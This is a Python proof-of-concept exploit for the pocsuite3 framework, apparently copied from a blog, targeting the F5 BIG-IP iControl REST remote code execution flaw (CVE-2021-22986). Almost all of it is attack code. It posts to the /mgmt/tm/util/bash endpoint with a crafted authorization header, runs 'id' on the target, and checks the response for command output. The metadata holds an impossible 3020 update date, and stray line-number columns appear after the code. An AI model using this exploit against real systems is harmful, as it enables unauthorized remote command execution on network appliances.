F5-2021-22986
poc:
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# @Author : RedTeamWing
# @CreateTime: 2021/3/21 下午2:52
# @FileName: F5-2021-22986.py
# @Blog:https://redteamwing.com
from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests, logger, VUL_TYPE
from pocsuite3.lib.utils import random_str
from urllib.parse import urlparse, urljoin
class DemoPOC(POCBase):
vulID = '2020-520' # ssvid
version = '1.0'
author = ['Wing']
vulDate = '2020-05-20'
createDate = '2020-05-20'
updateDate = '3020-05-20'
references = ['https://redteaming.net']
name = 'F5-2021-22986'
appPowerLink = ''
appName = 'F5'
appVersion = ''
vulType = VUL_TYPE.CODE_EXECUTION
desc = '''
'''
samples = []
install_requires = ['']
category = POC_CATEGORY.EXPLOITS.WEBAPP
def _verify(self):
result = {}
####
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:76.0) Gecko/20100101 Firefox/76.0',
'Content-Type': 'application/json',
'X-F5-Auth-Token': '',
'Authorization': 'Basic YWRtaW46QVNhc1M='
}
payload = {
}
path = "/mgmt/tm/util/bash"
data = {'command': "run", 'utilCmdArgs': "-c id"}
verify_code = "commandResult"
verify_code2 = "uid="
url = urljoin(self.url, path)
resp = requests.post(url=url, headers=headers, json=data, timeout=8, verify=False)
# resp = requests.post(url, data=payload)
print(resp.status_code)
try:
if verify_code in resp.text and resp.status_code == 200 and verify_code2 in resp.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['Payload'] = resp.text
except Exception as ex:
logger.error(str(ex))
return self.parse_output(result)
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
_attack = _verify
register_poc(DemoPOC)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
测试截图:
